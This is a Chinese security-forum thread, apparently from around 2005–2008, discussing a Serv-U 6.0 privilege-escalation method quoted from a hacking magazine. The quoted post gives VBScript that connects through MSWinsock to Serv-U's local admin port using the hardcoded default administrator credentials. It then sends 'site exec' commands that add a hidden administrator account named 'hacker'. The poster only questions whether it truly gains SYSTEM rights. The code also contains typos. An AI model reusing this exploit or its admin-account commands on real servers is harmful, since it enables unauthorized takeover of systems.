[讨论]Serv-u6.0提权新招（结帖） 权新招, 讨论

jjcd

[讨论]Serv-u6.0提权新招（结帖）
议题提交：宿心劫

第一次见到这段码时 认为是不可能的 因为控件的问题
现在听KEVIN的分析 就够了
我提出的第二个问题 是因为我没绕过一个弯
引用:
来源：黑客防线
适用环境：服务器禁用FSO，关掉Wscript.shelll,没有执行权限。
限制：没有更改管理员的密码，或者破解出了Serv-U的管理员的密码。Serv-U默认用户名：localadministrator? 密码：#|@$ak#.|k;0@p???下面用MSWinsock。Winsock建立一个连接，并且以System权限添加超级用户，代码如下：
Dim revdata
Dim sendata
Set sock=createobject(“MSWinsock.Winsock”)
Sock.protocol=0
Sock.connect “127.0.0.1”,43958
Sendata=”LocalAdministrator”& chr(10) &chr(13)
Sock.senddata snedata
Sendata=”#|@$ak#.|k;0@p” &chr(10) &chr(13)

Sock.senddata.sendata
  
使用这个代码就可以连上FTP了，接下来用Sock.senddata sendata 发送添加有执行权限用户的命令，想必大家该知道怎么做了吧，对了，就是用”site exec net user hacker hacker /add”?? “site exec net localgroup administrators hacker /add”
呵呵，就这样系统权限到手了，祝大家好运！
我有两个问题
一、MSWINSCK.OCX控件为VB 网络支持库  系统是不自带的
参考文章《关于VBS调用MSWinsock控件》
http://www.eviloctal.com/forum/read.php?tid=8748&fpage=1

二、文中提到"下面用MSWinsock。Winsock建立一个连接，并且以System权限添加超级用户"
我想问一下  这段本地提权的码 真的有system权限吗风停了 又吹 我忽然想起谁天亮了 又黑 我过了好几岁心暖了 又灰 世界有时候孤单的很需要另一个同类

帖子108 精华4 积分3417 阅读权限100 性别男 来自浙江 在线时间3 小时 注册时间2004-12-19 最后登录2008-4-20 查看详细资料TOP 赚更多的钱

kevin1986
荣誉会员